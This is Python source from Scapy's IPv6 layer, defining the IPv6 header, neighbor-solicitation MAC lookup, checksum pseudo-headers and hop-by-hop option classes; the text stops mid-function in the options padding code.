1# SPDX-License-Identifier: GPL-2.0-only
2# This file is part of Scapy
3# See https://scapy.net/ for more information
4# Copyright (C) Guillaume Valadon <guedou@hongo.wide.ad.jp>
5# Copyright (C) Arnaud Ebalard <arnaud.ebalard@eads.net>
6
7# Cool history about this file: http://natisbad.org/scapy/index.html
8
9
10"""
11IPv6 (Internet Protocol v6).
12"""
13
14
15from hashlib import md5
16import random
17import socket
18import struct
19from time import gmtime, strftime
20
21from scapy.arch import get_if_hwaddr
22from scapy.as_resolvers import AS_resolver_riswhois
23from scapy.base_classes import Gen, _ScopedIP
24from scapy.compat import chb, orb, raw, plain_str, bytes_encode
25from scapy.consts import WINDOWS
26from scapy.config import conf
27from scapy.data import (
28 DLT_IPV6,
29 DLT_RAW,
30 DLT_RAW_ALT,
31 ETHER_ANY,
32 ETH_P_ALL,
33 ETH_P_IPV6,
34 MTU,
35)
36from scapy.error import log_runtime, warning
37from scapy.fields import (
38 BitEnumField,
39 BitField,
40 ByteEnumField,
41 ByteField,
42 DestIP6Field,
43 FieldLenField,
44 FlagsField,
45 IntField,
46 IP6Field,
47 LongField,
48 MACField,
49 MayEnd,
50 PacketLenField,
51 PacketListField,
52 ShortEnumField,
53 ShortField,
54 SourceIP6Field,
55 StrField,
56 StrFixedLenField,
57 StrLenField,
58 X3BytesField,
59 XBitField,
60 XByteField,
61 XIntField,
62 XShortField,
63)
64from scapy.layers.inet import (
65 _ICMPExtensionField,
66 _ICMPExtensionPadField,
67 _ICMP_extpad_post_dissection,
68 IP,
69 IPTools,
70 TCP,
71 TCPerror,
72 TracerouteResult,
73 UDP,
74 UDPerror,
75)
76from scapy.layers.l2 import (
77 CookedLinux,
78 Ether,
79 GRE,
80 Loopback,
81 SNAP,
82 SourceMACField,
83)
84from scapy.packet import bind_layers, Packet, Raw
85from scapy.sendrecv import sendp, sniff, sr, srp1
86from scapy.supersocket import SuperSocket
87from scapy.utils import checksum, strxor
88from scapy.pton_ntop import inet_pton, inet_ntop
89from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \
90 in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \
91 in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo
92from scapy.volatile import RandInt, RandShort
93
94# Typing
95from typing import (
96 Optional,
97)
98
# This layer cannot work without IPv6 support in the socket module.
if not socket.has_ipv6:
    raise socket.error("can't use AF_INET6, IPv6 is disabled")

# Define the protocol numbers that the socket module fails to export.
for _proto_name, _proto_num in (
        ("IPPROTO_IPV6", 41),  # http://bugs.python.org/issue6926
        ("IPPROTO_IPIP", 4),  # https://bitbucket.org/secdev/scapy/issue/5119
):
    if not hasattr(socket, _proto_name):
        setattr(socket, _proto_name, _proto_num)
del _proto_name, _proto_num
107
# Import scapy.route6 for its side effect when conf.route6 is not set up yet.
if conf.route6 is None:
    # unused import, only to initialize conf.route6
    import scapy.route6  # noqa: F401
111
112##########################
113# Neighbor cache stuff #
114##########################
115
# Create the "in6_neighbor" cache that getmacbyip6() reads and fills through
# conf.netcache.in6_neighbor.
# NOTE(review): 120 is presumably the entry lifetime in seconds -- confirm
# against the new_cache() signature.
conf.netcache.new_cache("in6_neighbor", 120)
117
118
@conf.commands.register
def neighsol(addr, src, iface, timeout=1, chainCC=0):
    """Sends and receive an ICMPv6 Neighbor Solicitation message

    The solicitation targets 'addr' and is sent to the solicited-node
    multicast address (and matching multicast MAC) derived from it, in
    order to learn the MAC address of the neighbor owning 'addr'.

    :param addr: IPv6 address of the neighbor to resolve
    :param src: source IPv6 address put in the message
    :param iface: interface used for sending; its hardware address is used
        as source MAC and advertised in the Source Link-Layer Address option
    :param timeout: time to wait for an answer (1 second by default)
    :param chainCC: passed unchanged to srp1()
    :return: the answer (Ethernet frame), or None if nothing was received
    """
    # Solicited-node multicast address, kept in packed form.
    solicited_node = in6_getnsma(inet_pton(socket.AF_INET6, addr))
    ip_dst = inet_ntop(socket.AF_INET6, solicited_node)
    mac_dst = in6_getnsmac(solicited_node)
    mac_src = get_if_hwaddr(iface)

    request = (
        Ether(dst=mac_dst, src=mac_src) /
        IPv6(dst=ip_dst, src=src, hlim=255) /
        ICMPv6ND_NS(tgt=addr) /
        ICMPv6NDOptSrcLLAddr(lladdr=mac_src)
    )
    return srp1(request, type=ETH_P_IPV6, iface=iface, timeout=timeout,
                verbose=0, chainCC=chainCC)
146
147
@conf.commands.register
def getmacbyip6(ip6, chainCC=0):
    # type: (str, int) -> Optional[str]
    """
    Returns the MAC address of the next hop used to reach a given IPv6 address.

    Resolution order:
      - a multicast address is mapped directly to its multicast MAC;
      - a route through the loopback interface yields ff:ff:ff:ff:ff:ff;
      - otherwise the next hop given by conf.route6 (or the address itself
        when the next hop is '::') is looked up in the in6_neighbor cache
        and, on a miss, resolved with neighsol() and then cached.

    (chainCC parameter value ends up being passed to sending function
     used to perform the resolution, if needed)

    :return: the MAC address, or None when the solicitation got no answer

    .. seealso:: :func:`~scapy.layers.l2.getmacbyip` for IPv4.
    """
    # Net6 objects are reduced to their string form first.
    if isinstance(ip6, Net6):
        ip6 = str(ip6)

    if in6_ismaddr(ip6):  # mcast @
        return in6_getnsmac(inet_pton(socket.AF_INET6, ip6))

    iff, a, nh = conf.route6.route(ip6)
    if iff == conf.loopback_name:
        return "ff:ff:ff:ff:ff:ff"

    # Resolve the gateway instead of the final address when there is one.
    target = ip6 if nh == '::' else nh

    cached = conf.netcache.in6_neighbor.get(target)
    if cached:
        return cached

    reply = neighsol(target, a, iff, chainCC=chainCC)
    if reply is None:
        return None

    # Prefer the advertised link-layer address over the frame source.
    if ICMPv6NDOptDstLLAddr in reply:
        mac = reply[ICMPv6NDOptDstLLAddr].lladdr
    else:
        mac = reply.src
    conf.netcache.in6_neighbor[target] = mac
    return mac
194
195
196#############################################################################
197#############################################################################
198# IPv6 Class #
199#############################################################################
200#############################################################################
201
# Display names for the values of the IPv6 "Next Header" field.
ipv6nh = {
    0: "Hop-by-Hop Option Header",
    4: "IP",
    6: "TCP",
    17: "UDP",
    41: "IPv6",
    43: "Routing Header",
    44: "Fragment Header",
    47: "GRE",
    50: "ESP Header",
    51: "AH Header",
    58: "ICMPv6",
    59: "No Next Header",
    60: "Destination Option Header",
    112: "VRRP",
    132: "SCTP",
    135: "Mobility Header",
}

# Next Header value -> name of the class used as the default payload class.
ipv6nhcls = {
    0: "IPv6ExtHdrHopByHop",
    4: "IP",
    6: "TCP",
    17: "UDP",
    43: "IPv6ExtHdrRouting",
    44: "IPv6ExtHdrFragment",
    50: "ESP",
    51: "AH",
    58: "ICMPv6Unknown",
    59: "Raw",
    60: "IPv6ExtHdrDestOpt",
}
230
231
class IP6ListField(StrField):
    """
    Field holding a list of IPv6 addresses, 16 bytes each on the wire.

    When dissecting, the amount of data consumed is bounded either by
    ``length_from`` (a byte count) or by ``count_from`` (a number of
    addresses); ``length_from`` wins when both are provided.
    """
    __slots__ = ["count_from", "length_from"]
    islist = 1

    def __init__(self, name, default, count_from=None, length_from=None):
        StrField.__init__(self, name, [] if default is None else default)
        self.count_from = count_from
        self.length_from = length_from

    def i2len(self, pkt, i):
        # Every address takes 16 bytes once packed.
        return len(i) * 16

    def i2count(self, pkt, i):
        return len(i) if isinstance(i, list) else 0

    def getfield(self, pkt, s):
        max_count = None
        trailer = b""
        pending = s
        if self.length_from is not None:
            nbytes = self.length_from(pkt)
            if nbytes is not None:
                # Only the first nbytes belong to this field.
                pending, trailer = s[:nbytes], s[nbytes:]
        elif self.count_from is not None:
            max_count = self.count_from(pkt)

        addresses = []
        while pending:
            if max_count is not None:
                if max_count <= 0:
                    break
                max_count -= 1
            addresses.append(inet_ntop(socket.AF_INET6, pending[:16]))
            pending = pending[16:]
        return pending + trailer, addresses

    def i2m(self, pkt, x):
        chunks = []
        for item in x:
            try:
                packed = inet_pton(socket.AF_INET6, item)
            except Exception:
                # Not a literal address: take the first getaddrinfo() result.
                resolved = socket.getaddrinfo(item, None, socket.AF_INET6)[0][-1][0]  # noqa: E501
                packed = inet_pton(socket.AF_INET6, resolved)
            chunks.append(packed)
        return b"".join(chunks)

    def i2repr(self, pkt, x):
        if x is None:
            return "[]"
        return "[ %s ]" % ", ".join('%s' % y for y in x)
291
292
class _IPv6GuessPayload:
    name = "Dummy class that implements guess_payload_class() for IPv6"

    def default_payload_class(self, p):
        """
        Pick the payload class from the 'nh' field and the first payload bytes.

        :param p: raw bytes of the payload about to be dissected
        :return: the class used to dissect 'p'. Raw is returned for ICMPv6
            data that is empty or too short for its message type, and for
            unknown 'nh' values.
        """
        if self.nh == 58:  # ICMPv6
            if not p:
                # Nothing to read the ICMPv6 type from.
                return Raw
            t = orb(p[0])
            if len(p) > 2 and (t == 139 or t == 140):  # Node Info Query
                return _niquery_guesser(p)
            if len(p) >= icmp6typesminhdrlen.get(t, float("inf")):  # Other ICMPv6 messages  # noqa: E501
                if t == 130 and len(p) >= 28:
                    # RFC 3810 - 8.1. Query Version Distinctions
                    return ICMPv6MLQuery2
                return icmp6typescls.get(t, Raw)
            return Raw
        elif self.nh == 135 and len(p) > 3:  # Mobile IPv6
            return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
        elif self.nh == 43 and len(p) > 2 and orb(p[2]) == 4:
            # Segment Routing header: the routing type is the third byte,
            # so it is only read when that byte is actually present.
            return IPv6ExtHdrSegmentRouting
        return ipv6nhcls.get(self.nh, Raw)
312
313
class IPv6(_IPv6GuessPayload, Packet, IPTools):
    """
    IPv6 header.

    'plen' is computed at build time when left to None. The payload class
    is chosen from 'nh' by _IPv6GuessPayload.default_payload_class().
    """
    name = "IPv6"
    fields_desc = [BitField("version", 6, 4),
                   BitField("tc", 0, 8),
                   BitField("fl", 0, 20),
                   ShortField("plen", None),
                   ByteEnumField("nh", 59, ipv6nh),
                   ByteField("hlim", 64),
                   SourceIP6Field("src"),
                   DestIP6Field("dst", "::1")]

    def route(self):
        """Used to select the L2 address"""
        dst = self.dst
        scope = None
        if isinstance(dst, (Net6, _ScopedIP)):
            scope = dst.scope
        if isinstance(dst, (Gen, list)):
            # Several destinations: route according to the first one.
            dst = next(iter(dst))
        return conf.route6.route(dst, dev=scope)

    def mysummary(self):
        return "%s > %s (%i)" % (self.src, self.dst, self.nh)

    def post_build(self, p, pay):
        """Append the payload and fill in 'plen' when it was left to None."""
        p += pay
        if self.plen is None:
            # Payload length excludes the 40 bytes of the fixed header.
            tmp_len = len(p) - 40
            p = p[:4] + struct.pack("!H", tmp_len) + p[6:]
        return p

    def extract_padding(self, data):
        """
        Extract the IPv6 payload

        :param data: bytes following the IPv6 header
        :return: a (payload, padding) tuple. The split is made at 'plen',
            except for jumbograms (plen == 0 with a Hop-by-Hop header) where
            it is made at the Hop-by-Hop header length plus the value of the
            Jumbo Payload option (0 when the option is not found).
        """

        if self.plen == 0 and self.nh == 0 and len(data) >= 8:
            # Extract Hop-by-Hop extension length
            hbh_len = orb(data[1])
            hbh_len = 8 + hbh_len * 8

            # Extract length from the Jumbogram option
            # Note: the following algorithm take advantage of the Jumbo option
            # mandatory alignment (4n + 2, RFC2675 Section 2)
            jumbo_len = None
            # Only look inside the Hop-by-Hop header, and never past the
            # available data, so payload bytes cannot be taken for an option.
            scan_end = min(hbh_len, len(data))
            offset = 2
            while offset < scan_end:
                opt_type = orb(data[offset])
                if opt_type == 0xc2:  # Jumbo option
                    value = data[offset + 2:offset + 2 + 4]
                    if len(value) == 4:
                        # The length is carried in network byte order.
                        jumbo_len = struct.unpack("!I", value)[0]
                    break
                offset += 4

            if jumbo_len is None:
                log_runtime.info("Scapy did not find a Jumbo option")
                jumbo_len = 0

            tmp_len = hbh_len + jumbo_len
        else:
            tmp_len = self.plen

        return data[:tmp_len], data[tmp_len:]

    def hashret(self):
        """
        Return the hash used to pair requests with answers.

        Extension headers are looked through for the upper-layer 'nh' value,
        and Routing / Home Address information replaces the destination /
        source address in the hash.
        """
        if self.nh == 58 and isinstance(self.payload, _ICMPv6):
            if self.payload.type < 128:
                # ICMPv6 error: hash on the packet it quotes.
                return self.payload.payload.hashret()
            elif (self.payload.type in [133, 134, 135, 136, 144, 145]):
                return struct.pack("B", self.nh) + self.payload.hashret()

        if not conf.checkIPinIP and self.nh in [4, 41]:  # IP, IPv6
            return self.payload.hashret()

        nh = self.nh
        sd = self.dst
        ss = self.src
        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
            # With routing header, the destination is the last
            # address of the IPv6 list if segleft > 0
            nh = self.payload.nh
            try:
                sd = self.addresses[-1]
            except IndexError:
                sd = '::1'
            # TODO: big bug with ICMPv6 error messages as the destination of IPerror6  # noqa: E501
            #       could be anything from the original list ...
            sd = inet_pton(socket.AF_INET6, sd)
            for a in self.addresses:
                a = inet_pton(socket.AF_INET6, a)
                sd = strxor(sd, a)
            sd = inet_ntop(socket.AF_INET6, sd)

        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
            # With segment routing header (rh == 4), the destination is
            # the first address of the IPv6 addresses list
            try:
                sd = self.addresses[0]
            except IndexError:
                sd = self.dst

        if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
            nh = self.payload.nh

        if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
            nh = self.payload.nh

        if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
            foundhao = None
            for o in self.payload.options:
                if isinstance(o, HAO):
                    foundhao = o
            if foundhao:
                ss = foundhao.hoa
            nh = self.payload.nh  # XXX what if another extension follows ?

        if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
            sd = inet_pton(socket.AF_INET6, sd)
            ss = inet_pton(socket.AF_INET6, ss)
            return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()  # noqa: E501
        else:
            return struct.pack("B", nh) + self.payload.hashret()

    def answers(self, other):
        """Tell whether self (the reply) answers other (the request)."""
        if not conf.checkIPinIP:  # skip IP in IP and IPv6 in IP
            if self.nh in [4, 41]:
                return self.payload.answers(other)
            if isinstance(other, IPv6) and other.nh in [4, 41]:
                return self.answers(other.payload)
            if isinstance(other, IP) and other.proto in [4, 41]:
                return self.answers(other.payload)
        if not isinstance(other, IPv6):  # self is reply, other is request
            return False
        if conf.checkIPaddr:
            # ss = inet_pton(socket.AF_INET6, self.src)
            sd = inet_pton(socket.AF_INET6, self.dst)
            os = inet_pton(socket.AF_INET6, other.src)
            od = inet_pton(socket.AF_INET6, other.dst)
            # request was sent to a multicast address (other.dst)
            # Check reply destination addr matches request source addr (i.e
            # sd == os) except when reply is multicasted too
            # XXX test mcast scope matching ?
            if in6_ismaddr(other.dst):
                if in6_ismaddr(self.dst):
                    if ((od == sd) or
                            (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):  # noqa: E501
                        return self.payload.answers(other.payload)
                    return False
                if (os == sd):
                    return self.payload.answers(other.payload)
                return False
            elif (sd != os):  # or ss != od): <- removed for ICMP errors
                return False
        if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:  # noqa: E501
            # ICMPv6 Error message -> generated by IPv6 packet
            # Note : at the moment, we jump the ICMPv6 specific class
            # to call answers() method of erroneous packet (over
            # initial packet). There can be cases where an ICMPv6 error
            # class could implement a specific answers method that perform
            # a specific task. Currently, don't see any use ...
            return self.payload.payload.answers(other)
        elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
            return self.payload.answers(other.payload)
        elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
            return self.payload.answers(other.payload.payload)
        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
        elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
            return self.payload.answers(other.payload.payload)
        elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):  # BU in reply to BRR, for instance  # noqa: E501
            return self.payload.payload.answers(other.payload)
        else:
            if (self.nh != other.nh):
                return False
            return self.payload.answers(other.payload)
491
492
class IPv46(IP, IPv6):
    """
    This class implements a dispatcher that is used to detect the IP version
    while parsing Raw IP pcap files.
    """
    name = "IPv4/6"

    @classmethod
    def dispatch_hook(cls, _pkt=None, *_, **kargs):
        """Return IPv6 for version 6 data or ``version=6``, IP otherwise."""
        if _pkt:
            # The version is the upper nibble of the first byte.
            is_v6 = (orb(_pkt[0]) >> 4) == 6
        else:
            is_v6 = kargs.get("version") == 6
        return IPv6 if is_v6 else IP
508
509
def inet6_register_l3(l2, l3):
    """
    Resolves the default L2 destination address when IPv6 is used.

    :param l2: the link layer (unused here)
    :param l3: the IPv6 layer whose 'dst' is resolved with getmacbyip6()
    """
    destination = l3.dst
    return getmacbyip6(destination)


# Use the resolver above for IPv6 carried directly over Ether.
conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
518
519
class IPerror6(IPv6):
    """IPv6 packet quoted inside an ICMPv6 error message."""
    name = "IPv6 in ICMPv6"

    def answers(self, other):
        """
        Tell whether this quoted packet corresponds to 'other', the packet
        that was sent.

        Addresses must match (the destination is not checked when the request
        carries a Routing Header), then the upper layers are compared byte by
        byte over their common length. For TCP upper layers whose options
        differ, options, checksum and data offset are ignored.
        """
        if not isinstance(other, IPv6):
            return False
        sd = inet_pton(socket.AF_INET6, self.dst)
        ss = inet_pton(socket.AF_INET6, self.src)
        od = inet_pton(socket.AF_INET6, other.dst)
        os = inet_pton(socket.AF_INET6, other.src)

        # Make sure that the ICMPv6 error is related to the packet scapy sent
        if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:

            # find upper layer for self (possible citation)
            selfup = self.payload
            while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
                selfup = selfup.payload

            # find upper layer for other (initial packet). Also look for RH
            otherup = other.payload
            request_has_rh = False
            while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
                if isinstance(otherup, IPv6ExtHdrRouting):
                    request_has_rh = True
                otherup = otherup.payload

            if ((ss == os and sd == od) or  # < Basic case
                    (ss == os and request_has_rh)):
                # ^ Request has a RH : don't check dst address

                # Let's deal with possible MSS Clamping
                if (isinstance(selfup, TCP) and
                        isinstance(otherup, TCP) and
                        selfup.options != otherup.options):  # seems clamped

                    # Save fields modified by MSS clamping
                    old_otherup_opts = otherup.options
                    old_otherup_cksum = otherup.chksum
                    old_otherup_dataofs = otherup.dataofs
                    old_selfup_opts = selfup.options
                    old_selfup_cksum = selfup.chksum
                    old_selfup_dataofs = selfup.dataofs

                    try:
                        # Nullify them
                        otherup.options = []
                        otherup.chksum = 0
                        otherup.dataofs = 0
                        selfup.options = []
                        selfup.chksum = 0
                        selfup.dataofs = 0

                        # Test it and save result
                        s1 = raw(selfup)
                        s2 = raw(otherup)
                        tmp_len = min(len(s1), len(s2))
                        res = s1[:tmp_len] == s2[:tmp_len]
                    finally:
                        # recall saved values, even if building failed, so
                        # that neither packet is left modified
                        otherup.options = old_otherup_opts
                        otherup.chksum = old_otherup_cksum
                        otherup.dataofs = old_otherup_dataofs
                        selfup.options = old_selfup_opts
                        selfup.chksum = old_selfup_cksum
                        selfup.dataofs = old_selfup_dataofs

                    return res

                s1 = raw(selfup)
                s2 = raw(otherup)
                tmp_len = min(len(s1), len(s2))
                return s1[:tmp_len] == s2[:tmp_len]

        return False

    def mysummary(self):
        # Use the generic summary instead of the IPv6 one.
        return Packet.mysummary(self)
597
598
599#############################################################################
600#############################################################################
601# Upper Layer Checksum computation #
602#############################################################################
603#############################################################################
604
class PseudoIPv6(Packet):
    """IPv6 Pseudo-header for checksum computation"""
    name = "Pseudo IPv6 Header"
    fields_desc = [
        IP6Field("src", "::"),
        IP6Field("dst", "::"),
        IntField("uplen", None),
        BitField("zero", 0, 24),
        ByteField("nh", 0),
    ]
612
613
def in6_pseudoheader(nh, u, plen):
    # type: (int, IP, int) -> PseudoIPv6
    """
    Build a PseudoIPv6 instance as specified in RFC 2460 8.1

    The underlayers of 'u' are walked down to the first IPv6 instance, and
    the pseudo header is filled with:
    - the Next Header value 'nh'
    - the _final_ destination: the last address of a Routing Header (first
      address of a Segment Routing Header) that has a non null segleft and
      a non empty address list, else the destination of the IPv6 layer.
      The first such header met while walking down is the one used.
    - the _real_ source: the Home Address of a Destination Option header
      whose only option is a HAO, else the source of the IPv6 layer
    - the upper layer length 'plen'

    :param nh: value of upper layer protocol
    :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
        provided with all under layers (IPv6 and all extension headers,
        for example)
    :param plen: the length of the upper layer and payload
    :return: the pseudo header, or None (after a warning) when no IPv6
        underlayer is found
    """
    pseudo = PseudoIPv6()
    pseudo.nh = nh
    final_dst = 0
    home_addr = 0
    dst_found = False

    layer = u
    while layer is not None and not isinstance(layer, IPv6):
        is_rh = isinstance(layer, IPv6ExtHdrRouting)
        is_srh = isinstance(layer, IPv6ExtHdrSegmentRouting)
        if ((is_rh or is_srh) and layer.segleft != 0 and
                len(layer.addresses) > 0 and not dst_found):
            # Routing Header: last address; Segment Routing: first one.
            final_dst = layer.addresses[-1] if is_rh else layer.addresses[0]
            dst_found = True
        elif (isinstance(layer, IPv6ExtHdrDestOpt) and
                len(layer.options) == 1 and
                isinstance(layer.options[0], HAO)):
            home_addr = layer.options[0].hoa
        layer = layer.underlayer

    if layer is None:
        warning("No IPv6 underlayer to compute checksum. Leaving null.")
        return None

    pseudo.src = home_addr if home_addr else layer.src
    pseudo.dst = final_dst if final_dst else layer.dst
    pseudo.uplen = plen
    return pseudo
669
670
def in6_chksum(nh, u, p):
    """
    As Specified in RFC 2460 - 8.1 Upper-Layer Checksums

    The checksum covers the pseudo header built by `.in6_pseudoheader`
    followed by 'p'.

    :param nh: value of upper layer protocol
    :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
        provided with all under layers (IPv6 and all extension headers,
        for example)
    :param p: the payload of the upper layer provided as a string
    :return: the checksum, or 0 when no pseudo header could be built
    """
    pseudo = in6_pseudoheader(nh, u, len(p))
    return 0 if pseudo is None else checksum(raw(pseudo) + p)
688
689
690#############################################################################
691#############################################################################
692# Extension Headers #
693#############################################################################
694#############################################################################
695
696
697# Inherited by all extension header classes
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
    """
    Common base of the IPv6 extension header classes.

    The payload class is guessed by _IPv6GuessPayload from the 'nh' field
    that each subclass declares.
    """
    name = 'Abstract IPv6 Option Header'
    aliastypes = [IPv6, IPerror6]  # TODO ...
701
702
703# IPv6 options for Extension Headers #
704
# Display names of the option types carried by Hop-by-Hop and Destination
# Options headers. 0x63 (RPL Option, RFC 6553) is listed because RplOption
# uses this table for its 'otype' field.
_hbhopts = {0x00: "Pad1",
            0x01: "PadN",
            0x04: "Tunnel Encapsulation Limit",
            0x05: "Router Alert",
            0x06: "Quick-Start",
            0x63: "RPL Option",
            0xc2: "Jumbo Payload",
            0xc9: "Home Address Option"}
712
713
class _OTypeField(ByteEnumField):
    """
    Modified ByteEnumField that displays information regarding the IPv6 option
    based on its option type value (What should be done by nodes that process
    the option if they do not understand it ...)

    It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
    """
    # The two highest bits: action when the option is not recognized.
    pol = {
        0x00: "00: skip",
        0x40: "01: discard",
        0x80: "10: discard+ICMP",
        0xC0: "11: discard+ICMP not mcast",
    }

    # Third highest bit: whether the option data may change en-route.
    enroutechange = {
        0x00: "0: Don't change en-route",
        0x20: "1: May change en-route",
    }

    def i2repr(self, pkt, x):
        label = self.i2s.get(x, repr(x))
        return "%s [%s, %s]" % (
            label,
            self.pol[x & 0xC0],
            self.enroutechange[x & 0x20],
        )
735
736
class HBHOptUnknown(Packet):
    """
    IPv6 Hop-By-Hop Option of unknown type (generic type/length/data).

    It is also the entry point used to dissect options: dispatch_hook()
    redirects to the class registered in _hbhoptcls for the option type.
    """
    name = "Scapy6 Unknown Option"
    fields_desc = [
        _OTypeField("otype", 0x01, _hbhopts),
        FieldLenField("optlen", None, length_of="optdata", fmt="B"),
        StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen),
    ]

    def alignment_delta(self, curpos):
        """
        As specified in section 4.2 of RFC 2460, every options has
        an alignment requirement usually expressed xn+y, meaning
        the Option Type must appear at an integer multiple of x octets
        from the start of the header, plus y octets.

        That function is provided the current position from the
        start of the header and returns required padding length.
        """
        # By default, no alignment requirement
        return 0

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        if not _pkt:
            return cls
        # The first byte is the option type.
        return _hbhoptcls.get(orb(_pkt[0]), cls)

    def extract_padding(self, p):
        # What follows the option belongs to the next one.
        return b"", p
766
767
class Pad1(Packet):
    """IPv6 Hop-By-Hop Option: Pad1, a lone option type byte."""
    name = "Pad1"
    fields_desc = [
        _OTypeField("otype", 0x00, _hbhopts),
    ]

    def alignment_delta(self, curpos):
        """Return the padding needed before this option: none."""
        return 0

    def extract_padding(self, p):
        # What follows the option belongs to the next one.
        return b"", p
777
778
class PadN(Packet):
    """IPv6 Hop-By-Hop Option: PadN (type, length and padding data)."""
    name = "PadN"
    fields_desc = [
        _OTypeField("otype", 0x01, _hbhopts),
        FieldLenField("optlen", None, length_of="optdata", fmt="B"),
        StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen),
    ]

    def alignment_delta(self, curpos):
        """Return the padding needed before this option: none."""
        return 0

    def extract_padding(self, p):
        # What follows the option belongs to the next one.
        return b"", p
791
792
class RouterAlert(Packet):
    """RFC 2711 - IPv6 Hop-By-Hop Option: Router Alert."""
    name = "Router Alert"
    fields_desc = [
        _OTypeField("otype", 0x05, _hbhopts),
        ByteField("optlen", 2),
        ShortEnumField(
            "value", None,
            {0: "Datagram contains a MLD message",
             1: "Datagram contains RSVP message",
             2: "Datagram contains an Active Network message",
             68: "NSIS NATFW NSLP",
             69: "MPLS OAM",
             65535: "Reserved"},
        ),
    ]
    # TODO : Check IANA has not defined new values for value field of RouterAlertOption  # noqa: E501
    # TODO : Now that we have that option, we should do something in MLD class that need it  # noqa: E501
    # TODO : IANA has defined ranges of values which can't be easily represented here.  # noqa: E501
    #        iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml

    def alignment_delta(self, curpos):
        """Return the padding needed at 'curpos' to reach a 2n+0 offset."""
        multiple, offset = 2, 0
        return (offset - curpos) % multiple

    def extract_padding(self, p):
        # What follows the option belongs to the next one.
        return b"", p
817
818
class RplOption(Packet):
    """RFC 6553 - RPL Option."""
    name = "RPL Option"
    fields_desc = [
        _OTypeField("otype", 0x63, _hbhopts),
        ByteField("optlen", 4),
        BitField("Down", 0, 1),
        BitField("RankError", 0, 1),
        BitField("ForwardError", 0, 1),
        BitField("unused", 0, 5),
        XByteField("RplInstanceId", 0),
        XShortField("SenderRank", 0),
    ]

    def alignment_delta(self, curpos):
        """Return the padding needed at 'curpos' to reach a 2n+0 offset."""
        multiple, offset = 2, 0
        return (offset - curpos) % multiple

    def extract_padding(self, p):
        # What follows the option belongs to the next one.
        return b"", p
838
839
class Jumbo(Packet):
    """IPv6 Hop-By-Hop Option: Jumbo Payload."""
    name = "Jumbo Payload"
    fields_desc = [
        _OTypeField("otype", 0xC2, _hbhopts),
        ByteField("optlen", 4),
        IntField("jumboplen", None),
    ]

    def alignment_delta(self, curpos):
        """Return the padding needed at 'curpos' to reach a 4n+2 offset."""
        multiple, offset = 4, 2
        return (offset - curpos) % multiple

    def extract_padding(self, p):
        # What follows the option belongs to the next one.
        return b"", p
854
855
class HAO(Packet):
    """IPv6 Destination Options Header Option: Home Address Option."""
    name = "Home Address Option"
    fields_desc = [
        _OTypeField("otype", 0xC9, _hbhopts),
        ByteField("optlen", 16),
        IP6Field("hoa", "::"),
    ]

    def alignment_delta(self, curpos):
        """Return the padding needed at 'curpos' to reach an 8n+6 offset."""
        multiple, offset = 8, 6
        return (offset - curpos) % multiple

    def extract_padding(self, p):
        # What follows the option belongs to the next one.
        return b"", p
870
871
# Option type -> class used by HBHOptUnknown.dispatch_hook() to dissect it.
_hbhoptcls = {
    0x00: Pad1,
    0x01: PadN,
    0x05: RouterAlert,
    0x63: RplOption,
    0xC2: Jumbo,
    0xC9: HAO,
}
878
879
880# Hop-by-Hop Extension Header #
881
class _OptionsField(PacketListField):
    """
    List of options that pads itself when built.

    Unless the packet's 'autopad' value is false, Pad1/PadN options are
    inserted so that every option meets its alignment_delta() and the
    field ends on a multiple of 8 bytes. Positions are counted from
    'curpos', the offset at which the field starts.
    """
    __slots__ = ["curpos"]

    def __init__(self, name, default, cls, curpos, *args, **kargs):
        self.curpos = curpos
        PacketListField.__init__(self, name, default, cls, *args, **kargs)

    def i2len(self, pkt, i):
        # Length of the built field, padding included.
        return len(self.i2m(pkt, i))

    def i2m(self, pkt, x):
        try:
            autopad = getattr(pkt, "autopad")  # Hack : 'autopad' phantom field
        except Exception:
            autopad = 1

        if not autopad:
            return b"".join(map(bytes, x))

        def _filler(gap):
            # Pad1 fills one byte, PadN two or more, nothing for zero.
            if gap == 1:
                return raw(Pad1())
            if gap != 0:
                return raw(PadN(optdata=b'\x00' * (gap - 2)))
            return b""

        pos = self.curpos
        chunks = []
        for opt in x:
            gap = opt.alignment_delta(pos)
            pos += gap
            chunks.append(_filler(gap))
            encoded = raw(opt)
            pos += len(encoded)
            chunks.append(encoded)

        # Let's make the class including our option field
        # a multiple of 8 octets long
        tail = pos % 8
        if tail:
